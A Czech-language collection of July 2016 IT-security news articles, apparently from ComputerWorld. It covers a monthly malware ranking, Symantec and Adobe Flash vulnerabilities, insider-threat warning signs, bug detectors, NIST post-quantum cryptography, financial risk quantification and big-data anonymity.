Aktuálně se v přehledu nejčastějších kybernetických hrozeb objevuje i vir Agent.XWT, který otevírá vrátka dalším infiltracím. Nejrozšířenější hrozby v první pětici uzavírá kód ScrInject, který otevírá webové HTML stránky se škodlivými skripty nebo vloženými iframe objekty, které automaticky přesměrovávají zařízení ke stažení malware.

Druhá polovina žebříčku nejaktivnějších virů už neobsahuje tak rozšířené škodlivé kódy. Na šestou pozici se v dubnu posunul trojan HTML/Refresh, který přesměrovává internetový prohlížeč na nepříliš důvěryhodná URL. Sedmou pozici si stejně jako v březnu udržel virus Rammit, který se aktivuje při každém spuštění systému a jeho pomocí může útočník na dálku vypnout nebo restartovat napadený počítač.

Na osmou pozici z březnové třetí příčky v dubnu klesl malware Agent.CR, který ke svému maskování používá soubor typu LNK a v rámci něho zneužívá ke svým aktivitám systémový program rundll32.exe.

Devátou příčku pak obsadil polymorfní virus Sality, který při každém restartu operačního systému narušuje nebo odstraňuje bezpečnostní aplikace.

Dubnový žebříček nejrozšířenějších kybernetických hrozeb uzavírá malware Agent.BZ, který podobně jako Agent.CR využívá volání škodlivé funkce ze své DLL knihovny pomocí runddl32.exe.

Top 10 hrozeb - globální přehled

Win32/Bundpil
JS/TrojanDownloader.Nemucod
JS/Danger.ScriptAttachment
Win32/Agent.XWT
HTML/ScrInject
HTML/Refresh
Win32/Ramnit
LNK/Agent.CR
Win32/Sality
LNK/Agent.BZ
Top 10 hrozeb - Česká republika

JS/Danger.ScriptAttachment
JS/TrojanDownloader.Nemucod
HTML/Refresh
VBA/TrojanDownloader.Agent.BBD
Win32/Bayrob
JS/Exploit.Agent.NLV
HTML/IFrame
Win32/PSW.Fareit
Win32/PSW.Papras
VBS/TrojanDownloader.Small.NEN


Kritická chyba v antivirech Symantec a Norton umožňuje atak hackerů

27.7.2016    Zdroj: ComputerWorld Zranitelnosti
Chyba v jádru antiviru, užívaném hned v několika produktech firmy Symantec, je velmi snadno zneužitelná. Podle bezpečnostního technika Googlu, Tavise Ormandyho, který chybu objevil, může být zranitelnost zneužitá ke spuštění nakaženého kódu na počítačích, a to i vzdáleně.
Jediné, co útočník musí udělat, je poslat e-mail s vadným souborem jako přílohu nebo přesvědčit uživatele, aby klikl na nebezpečný odkaz.

Samotné spuštění souboru již není třeba: Jádro antiviru používá ovladač k zachycení všech systémových operací a automaticky soubor „projede“ ve chvíli, kdy jakkoli pronikne do systému.

Již v pondělí firma chybu opravila v Anti-Virus Engine (AVE) aktualizaci verze 20151.1.1.4 skrze službu LiveUpdate. Bezpečnostní vadou je přetečení bufferu, které mohlo nastat během parsování spustitelných souborů s vadným záhlavím.

Přípona souboru nehraje roli, má-li záhlaví označující jej jako přenosný spustitelný soubor, zapackovaný pomocí ASPacku, komerčního kompresního softwaru.

Zdaleka nejhorší zprávou však je, že Symantec AVE takové soubory rozbaluje uvnitř kernelu, tedy přímo v jádru operačního systému, oblasti s nejvyššími pravomocemi. To znamená, že úspěšné nakažení systému může vést ke kompletní ztrátě moci nad celým systémem.

„Na Linuxu, Macu a dalších unixových platformách může tento proces způsobit vzdálené přetečení heapu (haldy) v procesech Symantecu nebo Nortonu,“ vysvětluje Ormandy v článku k tématu. „Ve Windows tento proces vede k přetečení paměti přidělené kernelu, jak je sken jádra v kernelu postupně načítán, což z toho činí vzdálenou zranitelnost ring0 memory corruption – o moc horší už to být nemůže.“

Symantec zranitelnost ohodnotil na škále CVSS na 9,1 z 10 maximálních, tedy jako extrémně nebezpečnou.

„Nejčastější ukazatel úspěšného útoku by bylo okamžité selhání systému, tedy modrá obrazovka smrti ,“ popsala společnost v článku.

Uživatelé by se měli ujistit, že nainstalovali nejnovější možné aktualizace, dostupné pro jejich Symantec antivirové produkty.

Jde o nejnovější z dlouhé řady kritických chyb nalezených Ormandym a jinými bezpečnostními analytiky v antivirových produktech z posledních let. Většina z nich nepřestává výrobce antivirů kritizovat za jejich tendenci pokračovat s nebezpečnými skeny souborů, které v minulosti vedly ke zneužití chyb pomocí získaných pravomocí kernelu.


Poznejte zaměstnance, kteří vám chtějí škodit

27.7.2016    Zdroj: ComputerWorld Hrozby
Důvěra a IT jdou ruku v ruce. Zde jsou varovná znamení, kterých je potřebné si všímat, abyste se u některých zaměstnanců nespálili.
Přes všechny důrazy na nástroje a pomůcky se IT stále velmi týká lidí, kteří tyto nástroje a pomůcky vyvíjejí a používají. Spolupráce, vzájemný respekt a nadšení pro práci – to vše a také mnohem více je nezbytné k získání užitečných výsledků bez ohledu na to, zda váš tým IT dodává kód, opravuje chyby, pracuje s firemními uživateli nebo zabezpečuje systémy společnosti.

Jak se technologie stávají silnějšími a počítačové systémy jsou stále více zaplněné citlivými údaji, dostává se jeden lidský aspekt IT pod podrobnější kontrolu: Důvěra.

Během posledních třiceti let se mi povedlo získat úžasné zaměstnance. Lidé, u kterých mi intuice napověděla, že jde o správné kandidáty na pracovní pozici, prokázali své kvality nad má nejdivočejší očekávání.

Občas jsem však opominul včasná varovná znamení, že jinak skvělý kandidát či talentovaný a tvrdě pracující zaměstnanec postrádá, řekněme, silný morální kompas.

Když někdo, koho jste obdivovali, důvěřovali mu a věnovali se mu, se nakonec zachová vůči firmě jako darebák, nelegálně vniká do soukromé korespondence nebo používá údaje kreditní karty zákazníka na nákup počítačového vybavení pro svůj domov, začne vás nesprávně udělená důvěra v tuto osobu pronásledovat.

Pravdou je, že nelze vždy říci, kdo má potenciál stát se lumpem. Během své kariéry jsem však našel několik varovných příznaků, kterých je dobré si všímat. Žádný z nich není spolehlivý a je vždy dobré, aby lidé využívali výhodu pochybnosti.

Považujte tedy následující příznaky spíše za určitou formu nedokonalého lakmusového papírku než za těžce získané lekce vztahů se zaměstnanci, kteří se začali chovat jako darebáci.

Varovný příznak č. 1: Nečekaný nezdar při ověřování minulosti

Jedním z nejlepších zaměstnanců, které jsem za posledních třicet let získal, byla žena, která mi řekla, že jako náctiletá udělala hroznou chybu. Byla součástí skupiny pracovníků na námořní základně ve středisku, kde byl odhalen podvod s fiktivními výplatami finančních náhrad. Byla stíhána u soudu a tento podvodný čin skončil trvalým záznamem v jejím trestním rejstříku.

Během mého rozhovoru s ní byla o tomto incidentu velmi upřímná a vypadala velmi zkroušeně. Ujistila mě, že se něco takového už nestane. Při kontrole její minulosti jsem zjistil, že to byl jediný problém, který kdy měla. Dokonce ani nedostala žádnou pokutu za překročení rychlosti.

Najal jsem ji tedy a o deset let později podává špičkové výkony. Nyní pracuje jako manažerka. Její zaměstnanci ji milují a ona nás nikdy nezklamala. Možná že není divu, že také byla jednou z mých nejlepších spolupracovníků při odhalování nepoctivých pracovníků.

Je to neocenitelná dovednost. Je to také důkaz, že by žádná společnost či zaměstnavatel neměli automaticky diskvalifikovat z přijímacího procesu někoho, kdo je schopen prokázat, že už nemá nic společného se svým dřívějším špatným chováním.

Naproti tomu mi několik dalších potenciálních zaměstnanců neřeklo nic o svých záznamech v trestním rejstříku a namísto toho čekali, až povinná kontrola trestní minulosti odhalí jejich konflikt se zákonem.

Tato forma lži opomenutím se pro mě stala důvodem k odmítnutí. Obvykle v době, kdy ke kontrole minulosti dochází, už daná osoba je u nás zaměstnaná a pracuje v dočasné roli. Je to docela šok zjistit, že někdo, komu jste věnovali svůj čas a důvěru, k vám nebyl upřímný.

Ano, mnozí lidé váhají odhalit své trestní přestupky z minulosti, ale důvěra je hned od počátku zcela zásadní nutností.

Byla to těžce získaná zkušenost. Jeden zaměstnanec, kterého jsme si ponechali i po zjištění problémů s jeho minulostí, nakonec ukradl počítačové vybavení naší společnosti za tisíce dolarů.

Zjistil jsem to, když mě požádal, abych se u něj doma zastavil na diagnostiku případného malwaru v jeho domácím počítači. Když jsem vstoupil do jeho domu, uviděl jsem, že má počítačový rack za několik tisíc dolarů a síťové vybavení stejné, jako jsme měli v práci.

Když si uvědomil, že jsem vybavení poznal, jeho výraz byl jasný. Byla chyba mě zvát domů, minimálně aniž nejprve zakryl ukradené vybavení.

Snažil se mě přesvědčit, že to bylo vyřazené vybavení, které účetní oddělení již odepsalo, a že měl ústní souhlas předchozího šéfa, aby si vzal vybavení domů pro účely odborné přípravy. Rychlý telefonát a kontrola viditelných firemních sériových čísel prokázaly, že šlo o aktivní vybavení naší společnosti. Naštěstí většina zločinců není příliš inteligentní.

Varovný příznak č. 2: Říká, že mu minulí zaměstnavatelé nevěřili

Následující rčení mi v životě pomáhá: „Pokud jste vždy oběť, jste pravděpodobně problémem vy sami.“ Mnoho zaměstnanců, ne-li většina, mělo špatné zkušenosti s jedním nebo několika předchozími zaměstnavateli.

Často je to důvod, proč odešli. Pokud si však pracovník stěžuje na všechny své minulé zaměstnavatele, je téměř jisté, že se na tento seznam dostanete i vy, a to i za sebemenší problém.

Zde je varovným příznakem, že jim minulí zaměstnavatelé nevěřili – zejména když poté popisují situace s deficitem či úplnou absencí zdravého rozumu. Vzpomínám si na jednoho pracovníka, který si stěžoval, že se jeho starému zaměstnavateli nelíbilo, že se díval na soubory s výplatními páskami manažerů.

Udělal jsem malou kontrolu a zjistil jsem, že přistupoval ke všem druhům dat, u kterých k tomu neměl dobrý důvod. Jsem si jistý, že si mě přidal na svůj seznam.

Varovný příznak č. 3: Říká, že dokáže vniknout do systémů kolegů či firmy

Většina zaměstnanců, kteří vnikají do záležitostí svých kolegů, svým kolegům říká, že to dokážou udělat nebo že mohou proniknout do podnikových systémů. Je to divné, ale často je to pravda.

Pokud nespokojený pracovník mluví o tom, co by mohl udělat, kdyby chtěl, považujte to za varování. Ve většině případů nikdo nevypráví vedení o hrozbě, aniž o tom nijak nepřemýšlí, a pokud ano, vedení to nevezme na vědomí.

Ponaučení: Hovory o takových záležitostech by měly být dostatečné k přijetí opatření. Zaprvé – vzdělávejte své zaměstnance, aby tyto pasivně-agresivní hrozby hlásili. Když jsou ohlášené, berte je vážně.

Zajistěte, aby si nadřízený promluvil s pracovníkem za přítomnosti zástupce personálního oddělení, a zkontrolujte, zda pevné disky dotyčného zaměstnance neobsahují hackovací nástroje a důkazy neoprávněného přístupu.

To vše platí i pro zaměstnance přistižené s nedovolenými hackovacími nástroji (pokud ovšem nejsou potřeba pro jejich práci). To samé platí pro zaměstnance, kteří vlastní sbírky hesel jiných uživatelů (pokud není uchovávání těchto hesel součástí jejich pracovní činnosti).

Jestliže se během vyšetřování zjistí, že zaměstnanci vykonávali aktivní neoprávněné hackování, měli by být varováni, že se takové chování netoleruje a že může vyústit v jejich okamžité propuštění. Aktivity těchto zaměstnanců byste měli určitou dobu intenzivně sledovat.

Možná si myslíte, že jsem příliš tvrdý, ale desítky let zkušeností mě naučily potlačovat tyto hrozby již v zárodku. Přistihl jsem pár zaměstnanců s daty, která by mít neměli, a věřím, že dostatečně seriózní přístup k takové události může pomoci připomenout nevinným pracovníkům, aby se neodchylovali od toho, co je správné, a vyhnuli se problémům.

Varovný příznak č. 4: Přepíná obrazovku svého počítače, tabletu či mobilu, když jdete kolem

Tento scénář nastává často: Zastavíte se u kóje a vidíte spolupracovníka, jak rychle přejde na novou obrazovku. Je více než pravděpodobné, že se snaží zakrýt skutečnost, že se právě ulívá a nepracuje na firemních záležitostech.

Když však vidíte, jak přepíná obrazovky, i když očividně pracuje na podnikových záležitostech, je to velké varování. Všechny webové stránky a databáze, na kterých takoví lidé pracují, by neměly být před vedoucím týmu tajné.

Pokud se to stane více než párkrát, zajistěte důkladnou kontrolu.

Varovný příznak č. 5: Nikdy si nebere dovolenou

Staré účetní moudro radí být opatrný na zaměstnance, kteří si nikdy neberou dovolenou. Protože musejí stále zahlazovat stopy, aby je nikdo nechytil, nemohou si vzít ani den volna. To je jeden z důvodů, proč mnoho firem své pracovníky nutí, aby si brali dovolenou.


Flash Player opět terčem útoků, Adobe varuje před kritickým zneužitím

27.7.2016    Zdroj: ComputerWorld Zranitelnosti
Adobe Systems momentálně řeší kritickou zranitelnost ve Flash Playeru, kterou se již hackerům podařilo zneužít. Mezitím firma vydala opravy pro další zasažené aplikace, kterými jsou Reader, Acrobat a ColdFusion, na záplatě pro Flash Player se ale ještě pracuje.
Chyba je zaznamenaná jako CVE-2016.4117 a týká se verzí Flash Playeru 2.0.0.226 a starších pro Windows, OS X, Linux a Chrome OS. Úspěšné zneužití chyby umožňuje útočníkovi převzít vládu nad systémem.

„Adobe si je vědomo zpráv, že hack na CVE-2016-4117 existuje,“ píše společnost v článku zveřejněném v úterý. „Adobe tuto zranitelnost opraví v naší každoměsíční bezpečnostní aktualizaci, náplánované na 12. květen.“

V úterý také firma vydala balíček aktualizací pro Reader a Acrobat, které dohromady opraví 92 chyb. Většina z nich je hodnocená jako kritická.

Zranitelné verze zahrnují Acrobat DC a Reader DC 15.010.20060 a starší, 15.006.30121 a starší, a také Acrobat XI a Reader XI 11.0.15 a starší. Uživatelé si mohou produkt aktualizovat ručně kliknutím na „pomoc“ a následně „zkontrolovat dostupnost aktualizací“ v české verzi.

Firma také vydala aktualizace pro svůj ColdFusion aplikační server. Tyto aktualizace cílí na zranitelnost s ověřením validity vstupu, která mohla vést k mezistránkovým scripting útokům, na problém s ověřením host name, který způsoboval problém u wild card certifikátů, a na Java deserializační chybu v knihovně Apache Commons Collections.

Adobe radí uživatelům nainstalovat ColdFusion (verzi z roku 2016) Update 1, ColdFusion 11 Update 8 nebo ColdFusion 10 Update 19, podle toho, kterou vezi aplikace mají.

Instalace ColdFusion bývají cílem útočníků. V roce 2013 výzkumníci zjistili větší útok, kde hackeři zneužili zranitelností v ColdFusion a nainstalovali díky nim malware na IIS servery Microsoftu.


Kaspersky Lab dokáže nově zabezpečit i průmyslové systémy

12.05.2016  Zdroj: ComputerWorld Zabezpečení
Specializované bezpečnostní řešení pro ochranu kritické infrastruktury a zabezpečení průmyslových podniků představila včera v Praze firma Kaspersky Lab. KICS (Kaspersky Industrial CyberSecurity) podle tvůrců přináší jednotný přístup k IT bezpečnosti pro průmyslové podniky. Novinka přitom zabezpečuje ICS/SCADA servery, HMI panely a inženýrské pracovní stanice, PLC, aniž by nějak ovlivnilo plynulost a konzistenci provozu.
KICS je ve své podstatě kombinací běžných bezpečnostních technologií přizpůsobených pro potřeby průmyslových podniků. Obsahuje ochranu proti malwaru, whitelisting a funkci pro odhalování zranitelností.

To je ale rozšířené o technologie, které jsou speciálně navržené přímo pro průmyslová prostředí – jde o kontrolu integrity PLC programů (Integrity check for PLC programs), sémantický monitoring kontroly příkazů (Semantic monitoring of proces control commands) či telemetrická data (Telemetry data), která dokážou odhalit kybernetické útoky cílící na fyzické části infrastruktury.

Speciální režim Observability Mode se pak soustředí na odhalení kybernetických útoků, chyby provozního personálu a anomálie uvnitř průmyslové sítě. Centrální řídící panel pak umožňuje administrovat veškeré bezpečnostní prvky firmy Kaspersky Lab – tedy od antivirů až pro sofistikované systémy pro SCADA.

Řešení lze prý implementovat i do už existující ICS sítě a technologického procesu dané organizace.

Dodavatel navíc ke KICS poskytuje celou řadu doprovodných služeb včetně kyberbezpečnostních školení (cybersecurity training) pro IT profesionály či vzdělávacích programů pro běžné zaměstnance nebo penetrační testování (Cyber Security and Penetration Testing).

Další služba -- Incident Response -- podle jejích dodavatelů pomáhá lokalizovat narušení sítě, zmírnit následky, zamezit útočníkům hlouběji proniknout do infrastruktury, předcházet dalším útokům a rozvíjet krizový plán do budoucnosti.


Vyhledávání odposlechů

27.7.2016    Zdroj: ComputerWorld Ochrany
Miniaturizace elektronického zařízení má za cíl zvýšení pohodlí užívání. Dává to také široké možnosti k narušení soukromí pomocí odposlechů a minikamer malých rozměrů, které lze snadno ukrýt v místnostech nebo zakamuflovat v předmětech každodenní potřeby.
Mnoho situací vyžadujeochranu důvěrných informací, utajení údajů obchodních partnerů, diskrétnost vedených obchodních rozhovorů, na kterých závisí finanční bezpečí firmy. Nekalá konkurence je schopná zajít velmi daleko, aby ukradla důležité údaje. Instalují skryté kamery, odposlouchávají pomocí štěnic a jiných zařízení dostupných na trhu, které jsou pouhým okem neodhalitelné. Využívání služeb firem odhalujících odposlechy je velmi nákladné a nedá se vždy provést tak, aby nevzbudilo podezření spolupracovníků. Proto se vyplatí investovat do zařízení, které umožní ochránit firemní prostory před špionáží a v případě štěnic nebo mikrokamer umožní lokalizovat a zneškodnit je.

Detektory odposlechu se hodí také ve velmi soukromých situacích, kdy se veřejně známá osoba chce zabezpečit před odposlechem ze strany nepovolaných osob a únikem intimního obsahu do médií

Detektory odposlechu a skrytých kamer jsou vynikajícími zařízeními k zabezpečení svého soukromí a vždy, když máme podezření, že kdosi zasahuje do našich životů bez našeho vědomí.

Detektory odposlechu

Rádiovou štěnici je možné koupit na internetu již za několik stovek korun. Je možné je instalovat jak v kancelářích, tak v bytech nebo ve vozidlech. Kamuflování odposlechů v předmětech každodenní potřeby či v nich použité moderní technologie umožňují monitoring trvající i několik týdnů diskrétním způsobem nevzbuzujícím žádné podezření. Na trhu jsou dostupné také odposlechy GSM. Díky technologii globálního spojení je možné v kterékoliv chvíli zavolat z jakéhokoliv místa na světě na SIM kartu ukrytou např. v dálkovém napájení nebo v napájecí liště a diskrétním způsobem odposlouchávat okolí.

Vyhledávání odposlechů Spy Shop

Vyhledávání odposlechů je stejně oblíbené, jako samotné odposlouchávání. Zároveň s rozvojem odposlechových technik se rozvíjejí i způsoby jejich odhalování. V současnosti se na trhu nachází celá řada zařízení, které umožňují odhalovat odposlechy.

Nejčastějším řešením jsou skenery frekvence - moderní detektory spolupracující s měřiči jejich intenzity. Takováto kombinace umožňuje zachytit signál odposlechu a zaměřit jeho zdroj. V okolí, kde se nachází celá řada vysílačů signálů, je základem odhalení odposlouchávacího zařízení připojení se k přenosu a jeho odposlouchávání.

Pouze pokročilé skenery signálů a měřiče jejich síly s vysokou úrovní přesnosti se v houštině přenosů osvědčí.

Detektory skrytých kamer

Současné skryté kamery mají rozměry menší než zapalovač a jejich objektivy se šířkou počítanou v milimetrech umožňují nahrávat obraz v kvalitě i Full HD. Skryté kamery v předmětech každodenní potřeby slouží k diskrétnímu nahrávání a získání cenných informací. Miniaturní kamery s GSM modulem nebo IP kamery umožňují vzdálené monitorování místnosti pomocí mobilního telefonu nebo počítače. Takováto zařízení jsou prakticky neviditelné pouhým okem a stávají se potencionálním rizikem úniku cenných informací jak soukromých, tak firemních.

Spolu s rozvojem technik špionáže se rozvinuly také metody kontrašpionáže. Objevila se specializovaná zařízení k vyhledávání skrytých kamer. Současná technika je schopna odhalit jak drátové tak i bezdrátové kamery, zapnuté nebo ne. Dostupná v rozumných cenách a legální umožňuje dokonce i malým firmám chránit se před následky úniku informací.


Klasické šifrování už nestačí, kvantové počítače jej rozcupují

27.7.2016  Šifrování
Není tajemstvím, že mnoho z dnes užívaných metod šifrování by ve světě s kvantovými počítači, jejichž masovější nasazení se blíží, bylo zcela nepoužitelných. NIST, respektovaná organizace z oblasti standardů a technologií, hledá, jak z tohoto problému ven.
Právě NIST (National Institute of Standards and Technology) nedávno vydal zprávu, jejímž hlavním tématem byly šifrovací standardy v kvantovém světě. Zpráva naznačuje možnou dlouhodobou strategii, která by se problému vyhnula ještě předtím, než vůbec nastane.

„V poslední době šlo na kvantové počítače mnoho prostředků určených pro výzkum, a každý, od velkých počítačových společností přes vlády, chtějí, aby jejich šifrovací alhoritmy byly, jak my říkáme, ‘kvantově odolné,‘“ vysvětluje matematik NISTu Dustin Moody. „Takže až někdo postaví první kvantový počítač velkého rozsahu, chceme už mít k dispozici algoritmy, které se neprolomí.“

Současná kryptografie se často spoléhá na techniku matematického rozkladu velkých čísel k zajištění bezpečnosti, ale vědci z MIT a rakouské Univerzity Innsbruck nedávno představili, čemu říkají první pětiatomový kvantový počítač, schopný takové šifrovací metody prolomit.

Zatímco tradiční počítače operují s jedničkami a nulami, kvantové počítače se spoléhají na kvantové bity, tzv. „qubity,“ které mohou být zároveň 0 i 1 – tedy ve stavu, kterému říkáme superpozice. A superpozice slibuje obrovskou efektivitu a navýšení výkonu oproti současným počítačům.

Jedno z doporučení ve zprávě NISTu hovoří o tom, že společnosti by se měly soustředit na „kryptografickou obratnost,“ tedy schopnost rychle přejít na jiný druh šifrování -- takový, který bude bezpečnější. Vytvořit tyto bezpečné algoritmy je pak dlouhodobým cílem.

Zaujal vás tento článek? Přehled nejzajímavějších zpráv získáte odebíráním našeho newsletteru »
Za účelem dosažení tohoto cíle se vypíše soutěž, v níž členové veřejnosti navrhnou a otestují slibné nové šifrovací metody. Podobná soutěž se přitom už dříve osvědčila – vedla např. k vývoji SHA-3 hashovacích funkcí, používaných pro autentizaci digitálních zpráv. NIST plánuje zahájit novou soutěž během několika málo měsíců.

„Bude to dlouhý proces zahrnující veřejné prověřování algoritmů, odolných vůči kvantové technologii,“ říká Moody. „A nečekáme, že najdeme jen jednoho vítěze.“

Hned několik z dnes běžně fungujících bezpečnostních mechanismů by mohlo být prolomeno kvantovým počítačem, a to např. veřejné šifrovací klíče nebo digitální podpisy, takže bude třeba vytvořit vícero nových alternativ.

Ačkoli jsou kvantové počítače a s nimi související bezpečnostní hrozba ještě vzdálená budoucnost, NIST nehodlá ztrácet čas.

„Historicky trvalo dlouho, než se rozhodlo, že je šifrovací systém dobrý, a než jsme ho zařadili jako standard do produktů na trhu – může to trvat 10 i 20 let,“ pokračuje Moody. „Společnosti začaly reagovat na nové změny, a my cítíme, že je čas začít na tom pracovat.“


Vyčíslete si finanční hodnotu IT rizik

27.7.2016  Rizika
Manažeři zabezpečení běžně musejí dělat těžká rozhodnutí o tom, jaká rizika snižovat, jaká zcela eliminovat nebo převést a konečně která jen akceptovat. I rozpočet na zabezpečení má totiž své meze.
Přijímání rozhodnutí ohledně rizik vyžaduje důkladné chápání dopadu těchto opatření, znalost dostupných ochran a někdy také odvahu učinit těžké rozhodnutí. Cílem tohoto článku je poskytnout rady, které by bezpečnostním manažerům mohly pomoci při tomto obtížném rozhodování o rizicích.

Stanovte dopady

Pokud způsob stanovení rizika není v souladu se samotným podnikáním vaší firmy, potom na tom bude metoda, jak se rizika ošetří, obdobně. Jestliže stále určujete riziko podle staré kvalitativní stupnice „nízké, střední, vysoké“, jak potom můžete posoudit, zda konečné rozhodnutí odpovídají potřebám vaší firmy?

Jak popíšete nejvyššímu vedení nebo členům představenstva, jaký dopad mohou mít příslušná rizika na firmu, a jak odůvodníte investice potřebné pro zabezpečení, abyste je přesvědčili o přínosu přijetí opatření?

Když dostanete od vedení otázku na návratnost investic (ROI) do zabezpečení, jak na ni odpovíte?

Chcete-li se vyzbrojit odpověďmi na tyto otázky, musíte nejprve správně stanovit dopad, jaký by mělo dané riziko na vaši firmu. A chcete-li pochopit dopad, budete muset vědět, jaká aktiva příslušná hrozba postihne (v případě, že událost skutečně nastane), jak rozsáhlé postižení bude a jaká bude souhrnná obchodní hodnota zasažených aktiv.

Při výpočtu hodnoty pro firmu je důležité zvážit informační aktiva stejně jako aktiva infrastruktury. Hodnota vašich informačních aktiv ale nemusí být tak zřejmá jako u aktiv infrastruktury.

Nedávná zpráva společnosti Forrester Research to částečně vysvětluje slovy: „...hodnota informací je procento současného a budoucího obratu, které tyto informace vytvoří, minus přímé a nepřímé náklady na tvorbu, správu a jejich ochranu.“

Pokud se dané riziko stane skutečností, bude dopad na vaši firmu kombinací nákladů spojených s událostí samotnou plus ztracený obrat v důsledku nedostupnosti takových aktiv.

Ponemon Institute nabízí několik užitečných průvodců jako například náklady na vyzrazení osobních dat (například citlivé osobní údaje) podle záznamů. Využijte tyto průvodce, ale vypočítejte také obrat, který vaše firma ztratí v případě nedostupnosti zasažených aktiv.

Při vyjadřování hodnoty v souvislosti s rizikem tuto hodnotu vyčíslete v penězích. Když to uděláte, budete moci porovnat obchodní hodnotu s finančním vyjádřením rizika pomocí stejného měřítka.

To je podstata vyčíslení finanční hodnoty rizika. Vyjádření finanční hodnoty rizik tímto způsobem umožní přizpůsobit bezpečnostní program podnikovým cílům.

Firmy existují proto, aby vydělávaly peníze, takže vyčíslení hodnoty rizik v podobě peněz vám pomůže poměřovat je podle jejich dopadu na vši organizaci.

Nejvyšší vedení chápe ekonomické aspekty mnohem lépe než bezpečnostní rizika. Když mu vysvětlíte své důvody pro zmírnění (či nezmírnění) daného rizika, bude schopné udělat informovanější rozhodnutí, protože to bude v kontextu, kterému rozumí.

Vyjádření finanční hodnoty klíčových rizik

Proces vyjádření finanční hodnoty rizika vyžaduje důkladné pochopení, a to asi nebudete chtít dělat pro každý existující systém a síťové bezpečnostní riziko. Místo toho se zaměřte jen na vyčíslení finanční hodnoty rizik s nejvyšší hodnotou, jako jsou hrozby, které by mohly zasáhnout kritická podniková aktiva a například ovlivnit produktivitu firmy.

K určení peněžní hodnoty rizika je nutné pochopit pravděpodobnost výskytu rizika a také dopad na vaši firmu.

Při určování pravděpodobnosti se zaměřte na konkrétní opatření, která vaše organizace používá ke snížení dopadů daného rizika, versus opatření, jež považujete za potřebné zavést ke zmírnění této hrozby.

Vytvořením poměru již zavedených opatření a opatření, která je třeba ke zmírnění rizika zavést, se blížíme k vyjádření pravděpodobnosti výskytu.

Je ale důležité si uvědomit, že se zaměřujeme jen na konkrétní opatření, která řeší dané riziko (rozhodně nemáme na mysli všechna opatření v rámci vaší organizace). V různých situacích mohou být některá opatření cennější než jiná, takže přiřazujte každému z nich váhu podle zvažovaného scénáře.

Když toto cvičení pak budete později dělat s cílem vyčíslit finanční hodnotu dalších rizik, uvědomte si, že se jak příslušná opatření, tak i jejich odpovídající váhy mohou změnit.

Řekněme, že rizikem, u kterého vyčíslujete hodnotu, je „ochrana před únikem dat“ z vašeho podnikového systému ERP (v tomto příkladu tedy kritická podniková aplikace). Našli jste například devět konkrétních opatření, u kterých se domníváte, že uspokojivě řeší riziko úniku dat.

Každému z nich přiřadíte váhu 1–10 (10 označuje nejvyšší hodnotu). Při hodnocení opatření určíte, které z nich už používáte a které nikoliv (viz tabulku 1).

Tabulka 1: Opatření pro zamezení úniku dat z ERP

---

Použitelná opatření potřebná pro riziko
Váha
Použito?
Segregace odpovědností
8
Ano
Minimalizace oprávnění
10
Ano
Šifrování databází
8
Ne
Protokolování a analýza událostí zabezpečení
8
Ne
Bezpečnostní zásady a postupy
7
Ano
Prevence úniků dat (DLP)
10
Ano
Firewall
8
Ano
Dvoufaktorová autentizace
10
Ne
Šifrovaný vzdálený přístup
10
Ano
CELKEM
79
53 (79–26)


Zachování anonymity? S big daty spíše zbožné přání

27.7.2016  Zabezpečení
Pro zachování anonymity osobních informací při shromažďování big dat existují účinné metody. Záleží však z velké míry na tom, jak často se využívají. A většina expertů uvádí, že to není moc často.
Jak anonymní může člověk v dnešním digitálním světě být? Nejde o skupiny hacktivistů, ale o anonymitu průměrných lidí v situaci, kdy se jimi vytvářená data shromažďují v podstatě každým – počínaje marketingem, webovými stránkami, výzkumnými pracovníky, vládními organizacemi atd.

Je shromažďování údajů pro potřeby big dat – i s odstraněním osobních údajů či zašifrováním – stále zranitelné vůči metodám zpětného ztotožnění, které identifikuje jednotlivce až do té míry, že je možné nebo už probíhá vlezlé narušování soukromí?

Nebo lze zachovat jednotlivcům bezproblematickou anonymitu v moři dat, která se používají ke zjišťování trendů, sledování šíření nemoci, určování oblastí s vysokou kriminalitou nebo k dalším záležitostem, jež zlepší hospodářský blahobyt či zdraví populace?

Je anonymita zajištěná?

Nečekejte od zástupců IT a odborníků na soukromí jednomyslnou odpověď. V této oblasti stále probíhají diskuze. Skupina na jedné straně zahrnuje autory dokumentu „Big data a inovace, náprava záznamů: deidentifikace funguje“ z června 2014, kde se uvádí, že soukromí je dostatečně podporované a média by měla přestat přehánět.

Její autoři Daniel Castro a Ann Cavoukian kritizují „zavádějící titulky a výroky v médiích“, které naznačují, že osoby s pouze průměrnými znalostmi a správnými technologickými nástroji dokážou odhalit totožnost osob, jejichž data se anonymizovala.

Chyba způsobující šíření tohoto mýtu je podle nich nikoli v samotných zjištěních prezentovaných výzkumníky v základní literatuře, ale „tendence komentátorů této literatury zveličovat publikovaná zjištění“.

Tvrdí, že správně udělaná anonymizace je prakticky neprůstřelná a snižuje riziko identifikace osob na méně než 1 %, což je méně než riziko narušení soukromí při dolování soukromých informací z vynášeného odpadu, který může obsahovat citlivé osobní informace.

Také argumentují, že neopodstatněný strach ze ztráty anonymity může podkopat „pokrok v oblasti analýz dat, které otevírají možnosti použití anonymizovaných datových souborů způsoby, jež nikdy dříve nebyly možné – třeba pro vytváření značných sociálních a ekonomických přínosů“.

Uznávají však, že aby byl proces anonymizace účinný, nesmí je uskutečňovat povrchním způsobem. A to je podle Pam Dixonové, výkonné ředitelky světového fóra pro soukromí (World Privacy Forum), skutečný problém. Ona a další tvrdí, že mimo kontrolované prostředí akademického výzkumu anonymita a soukromí v podstatě přestaly existovat.

Nedostatky soukromí

Dixonová neoponuje tvrzením o dosažitelné účinnosti ze zmíněného dokumentu, ale upozorňuje, že v reálném světě nedochází k důsledné anonymizaci všech množin dat.

„Ve skutečnosti to lidé nebudou dělat důsledně,“ tvrdí Dixonová a dodává. „Chcete-li získat skutečnou anonymitu při zpracování big dat, musíte použít mimořádně širokou úroveň agregace.“

Pokud se podle ní bavíme jen o údajích shromážděných pro celostátní či lokální trendy, potom lze anonymizace dosáhnout, protože nejde o samotné jednotlivce. Jestliže se však mluví o počtu osob s chřipkou v Praze a jsou k dispozici všechna poštovní směrovací čísla, je to už něco jiného.

Joseph Lorenzo Hall, hlavní technolog Centra pro demokracii a technologie (CDT, Center for Democracy & Technology), souhlasí, že ačkoli důsledná anonymizace je demonstrativně účinná, ve světě sběru dat tento ideální stav nevzniká. Jednou z příčin podle něj je, že skutečně neprůstřelná anonymizace snižuje užitečnost údajů.

